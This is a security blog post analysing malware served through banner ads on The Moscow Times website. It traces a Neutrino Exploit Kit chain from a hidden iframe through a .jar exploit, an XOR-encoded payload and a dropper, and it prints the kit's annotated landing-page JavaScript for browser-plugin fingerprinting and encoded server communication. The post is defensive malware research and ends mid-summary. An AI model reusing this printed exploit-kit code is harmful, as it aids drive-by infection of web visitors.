Sunday, October 6, 2013

Into the Maw - Hunting Malware on The Moscow Times Website

Hello, internets! I was recently contacted by @CwacCwac on Twitter with some information about malware being delivered via The Moscow Times website. He sent me a pcap, so I started digging. I had a lot of fun with it, and it's been far too long since I've written a blog post, so here we are. Let's get started...

The Entry Vector

CwacCwac told me that he wasn't always getting the page to deliver the malware, so that immediately made me think the entry vector was either something with a time or cookie-based redirect, maybe CookieBomb or Darkleech, or a rotating banner ad of some kind. As it turns out, it was the latter. occasionally pulls banners from In this case, one of the banners contains a 1x1 pixel iframe with a source tag pointing to the landing page. You can see it in the wireshark snapshot below:

We can see that it's pointing to a landing page hosted on hxxp://

The Landing Page

Following the traffic to the landing page gives away several pieces of information, seen below (Thanks to @MalForSec for being such a valuable resource!). The landing page is Neutrino Exploit Kit 
.<link href='nqysfzegyysshnu.css' rel='stylesheet'><link href='vyyuefapf.css' rel='stylesheet'><link href='qmhfiuvhnb.css' rel='stylesheet'>
.<link href='scbepbmaytlt.css' rel='stylesheet'><link href='vcehdnzg.css' rel='stylesheet'><link href='gkalbgu.css' rel='stylesheet'>
.<script src='hgqzyxntijrhe.js'></script><script src='melsrceyhntdugf.js'></script>
.<script src=""></script>.
.<script src='niongmaaukrbooot.js'></script><script src='gkck.js'></script>
.<script type="text/javascript" src="index.js"></script> //index.js here is PluginDetect v8.0
.<script src='xboshtugh.js'></script><script src='uujgv.js'></script>
  <script type="text/javascript">
  var _doc = document;
  function req(a, b, c, d, e) {
   var m = PluginDetect.getVersion, //SecMem - Using PluginDetect to detect plugin versions
    n = decodeURIComponent,
    p = encodeURIComponent,
    h = xor,
    ov = office_ver,
    g = [{
     adobe_reader: "AdobeReader"
    }, {
     java: "Java"
    }, {
     flash: "Flash"
    }, {
     quick_time: "QuickTime"
    }, {
     real_player: "RealPlayer"
    }, {
     shockwave: "Shockwave"
    }, {
     silver_light: "Silverlight"
    }, {
     vlc: "VLC"
    }, {
     wmp: "WMP"
    f = [];
   f.push("hid:::" + a);
   for (var k in g)
    for (var l in g[k]) f.push(l + ":::" + m(g[k][l]));

   f.push("of"+"fi"+"ce:"+"::" + ov());
   a = {};
   a[d] = c;
   a[e] = p(h(f.join(";;"+";"), c)); //SecMem - Join the array with ;;;, then XOR data, then encode data, then POST the data.
   $.post(b, a, function (a, b) {
    $("b"+"o"+"d"+"y").append(h(n(a), c)) //SecMem - This is the function that's going to decode commands via XOR and urldecode. Looks like this when variables replaced: xor(decodeURIComponent(a), c)) where a and c are used in the XOR function below.

  function xor(a, b) {
   for (var c = "", d = 0, e = 0, d = 0; d < a.length; d++) e = Math.floor(d % b.length), c += String.fromCharCode(a.charCodeAt(d) ^ b.charCodeAt(e));
   return c

  function office_ver() {
   var a = 0,
    b = 0;
   try {
    a = new ActiveXObject("SharePoint.OpenDocuments.4")
   } catch (c) {}
   try {
    b = new ActiveXObject("SharePoint.OpenDocuments.3")
   } catch (d) {}
   return "object" == typeof a && "object" == typeof b ? "2010" : "number" == typeof a && "object" == typeof b ? "2007" : null

  $(_doc).ready(function () {
   req("524e888caea2cc69190294b5", "tmzhlxglvpj", "ewkipl", "qvlajrdth", "wtfqgj") //SecMem - These are the variables passed into the function req() - a, b, c, d, and e respectively
 <img src='fbdt.jpg'><img src='mpxwsiedgfry.jpg'><img src='ttsvonfvi.jpg'> //SecMem - These image links will trigger GET requests for C2 commands later on.
 <img src='qaggrsvppo.png'><img src='rezjcnuvgnrvb.png'><img src='jlnwbndifweu.jpg'><img src='sfkwetzsouzcl.png'>

Encoded Communication

Once the landing page figures out what plugins the browser has and all the other objects are done loading (img tags, etc.), it forms a POST request using part of function req(). Before the POST request gets XORed and urlencoded, it looks like this:

Once it's XORed and encoded it looks like this:
The POST request is made to the server using the above data, to which the server responds with:

The .jar file

I had some issues decoding the response, but given what I know about Neutrino, I know it likely decodes to a java applet that points to a .jar file. Thankfully that was easy to verify because the very next GET request was for a .jar file, which is seen here:

I am not sure what CVE this .jar file exploits, but here's the VT report for it:

The Encoded Payload and Decoded Dropper

Following the .jar GET request, there's another GET request for what we can safely assume a binary payload. However, it doesn't look like an exe at first:

Doesn't look like an exe, however it should be pretty easy to tell that it's been XORed. Thankfully the XOR key is really simple. A little trial and error to find the XOR key and we get 6D 70 68 6A. After XORing the file with that key, it becomes much more familiar looking:

The decoded payload has a decent detection rate on VirusTotal as well:

The Dropper in Action

Based on some quick analysis, this exe appears to be a dropper. A new file named ldhpywws.exe is created under %userprofile%\Local Settings\Temp\. Below are screenshots the dropper subroutine in IDA Pro, and the actual file about to be dropped in OllyDbg.

IDA Pro, dropper subroutine:

OllyDbg, prior to the actual file drop:

Moments later, another file is dropped in the same directory - setup.dat:

I'm unsure the purpose of this file, but the data inside of it is completely unreadable. It's possible it's encrypted data that gets used later. Shortly after the .dat file gets dropped, ldhpywws.exe starts running as a subprocess of the original payload. I don't have the time to do an analysis of that file just yet, but I may be able to get to it soon. We'll see. Hope you enjoyed the read!



In a nutshell, here's what I discovered: